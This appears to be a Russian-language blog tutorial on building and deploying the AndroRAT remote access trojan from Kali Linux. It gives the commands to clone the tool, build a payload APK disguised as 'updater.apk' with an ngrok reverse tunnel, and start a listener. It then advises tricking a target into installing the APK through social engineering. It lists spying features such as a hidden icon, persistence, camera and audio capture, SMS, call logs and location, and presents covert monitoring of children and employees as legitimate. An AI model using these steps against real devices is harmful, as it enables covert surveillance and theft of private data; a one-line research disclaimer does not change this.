Android – самая популярная мобильная операционная система в современном мире.
В сегодняшней статье мы узнаем, “как удаленно контролировать устройство Android?”.
Для этого мы будем использовать приложение на помощью Kali Linux.
С помощью этого метода родители могут контролировать мобильные устройства своих детей, компания может следить за тем, что делают сотрудники на предоставленных им устройствах.
В принципе, мы можем использовать это для мониторинга любого устройства Android.
Для этого мы будем использовать программу AndroRAT.
Название говорит само за себя: Andro – Android, а RAT – Remote Access Tool/Trojan.
AndroRAT предназначен для удаленного управления системой Android и получения от нее информации.
Это клиент-серверное приложение, разработанное на Java Android для клиентской части, а серверная часть написана на Python.
AndroRAT будет работать на устройствах с Android 4.1 (Jellybean) по Android 9 (Oreo) (API 16 по API 28).
Этот RAT также работает на Android 10, но некоторые команды интерпретатора будут нестабильны.
Особенности AndroRAT
- Постоянный бэкдор
- Невидимый значок после установки.
- Легкий apk работает 24X7 в фоновом режиме.
- Использует очень мало ресурсов, поэтому не может быть замечен.
- Автоматический запуск после перезагрузки.
- Аудио и фотосъемка с обеих камер.
- Просмотр журнала звонков и SMS.
- Получение текущего местоположения, данных SIM-карты, IP, MAC-адреса устройства.
Установка и использование AndroRAT в Kali Linux
Прежде всего, нам необходимо установить Python3 на нашу систему Kali Linux.
Это можно сделать с помощью следующей команды:
sudo apt install python3 python3-pip
Теперь нам нужно установить и настроить Java 8 (OpenJDK 8) в нашей системе.
Мы уже показывали это в предыдущей статье.
🐉 Как установить Java OpenJDK8 на Kali Linux вручную
Теперь нам нужно клонировать AndroRAT в нашей системе с GitHub с помощью следующей команды:
git clone https://github.com/karma9874/AndroRAT
Теперь нам нужно переместиться в каталог AndroRAT с помощью команды mv:
mv AndroRAT
Затем нам нужно установить все требования для AndroRAT с помощью следующей команды:
pip3 install -r requirements.txt
После этого нам нужно установить ngrok и установить токен аутентификации ngrok в нашей системе, мы установили его в нашей предыдущей статье.
Чтобы установить ngrok на нашу систему:
Взлом с помощью php пэйлоадов и ngrok
Теперь мы можем создать вредоносный APK-файл (полезную нагрузку), для этого нам нужно выполнить следующую команду:
python3 androRAT.py --build --ngrok -p 8888 -o ~/Desktop/updater.apk
В приведенной выше команде видно, что мы использовали python скрипт androRAT.py и собрали наш пейлод с помощью флага –build, затем мы используем опцию –ngrok, потому что мы установили ngrok в нашей системе (это будет проще, иначе мы можем использовать наш IP-адрес с флагом -i, используя ngrok мы можем легко запустить слушателя).
Если мы хотим, мы можем установить иконку для приложения, используя флаг –icon, за которым следует путь к файлу иконки в нашей системе, но эта полезная нагрузка работает в фоновом режиме, поэтому мы это пропустим.
Затем мы задаем порт для этой службы, после чего задаем имя выходного файла с помощью флага -o.
На выводе видно, что AndroRAT собирает и подписывает apk-файл, также мы видим, что выходной файл (updater.apk) находится на нашем рабочем столе.
После завершения процесса сборки система автоматически запустит слушателя.
Теперь слушатель AndroRAT запущен и ожидает подключения.
Теперь мы можем отправить наш apk-файл на устройство Android с помощью методов социальной инженерии и убедить целевого пользователя установить его.
¯\_(ツ)_/¯ Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.